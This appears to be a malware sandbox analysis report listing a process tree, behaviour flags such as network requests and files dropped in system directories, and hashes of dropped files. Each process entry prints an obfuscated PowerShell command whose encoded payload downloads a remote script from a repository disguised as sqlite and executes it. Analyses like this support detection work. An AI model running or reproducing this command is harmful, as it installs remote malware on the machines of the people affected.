C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:4640
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:4684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4704
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8307b1ccd9644ce9fca4e1e69cd4a3f1
SHA1e8c60fbe21eeb0cc9666e40c6789864422223b6f
SHA256f1a0be8ca304128474019504bc192fb896d58fe3c6f96ece7ff3857c7f0d8f81
SHA51209dd084a96ee5d89cc8d9c7fa07f9506d28822e7a34327dc42677de45340d935ced4605667b64b4afb4c4ee7b4765646626329321dc2be6598d9f360f0ffe1d3
-
MD5
736174f3b5b458ba1d217896a14f4b0f
SHA17ae1b95420d1a255777a82be4f48ff8f03a04b4f
SHA256cb5f85407b0e80ed898a3f1bf58db26065f57af31cb2f6c697166db509ac9dad
SHA512e656ebcb3d53a77dc810dc776e24ad7fd854fff604642557e0bf92e4ecc95af74816ebe63a66689541b1ae0fdd4f3dddcb873e0a5430d61271502e1fa0393883
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
d722ad1eacd192e12df0ba2fb28951b4
SHA1d22ba3ccb96380f57c0b1a639597a2fd84d3b090
SHA256e813cefcca45cc4fa9959a53f2af1a877296eab8ad9312175bb3abf100b092b0
SHA512afb7c694fdb5139f4ccec4ac9103dc4aec6a96fd20113e0bdefc1e1bdcde3f86e773757b71e7e35c38dad44f24ea260aa5885aaa5cbcb88fdbfffc56d29de23b
-
MD5
7068c371e467d4f1f0ef646581709c79
SHA104a6971a0ac7026230918bdd618764be707f0216
SHA256db30b6120715a4d1f2e30c58a1892dca24af57f1f0e2826cf203167e44d854c1
SHA5126fc5ab8e42b065d07741964be6bd12f1e2118178126cfec8c665b3b3467398fc8638d7ed6ffa7833c88a178b39ad037fbaec243ded8d25fe0109fb22cc78dbeb
-
MD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
MD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc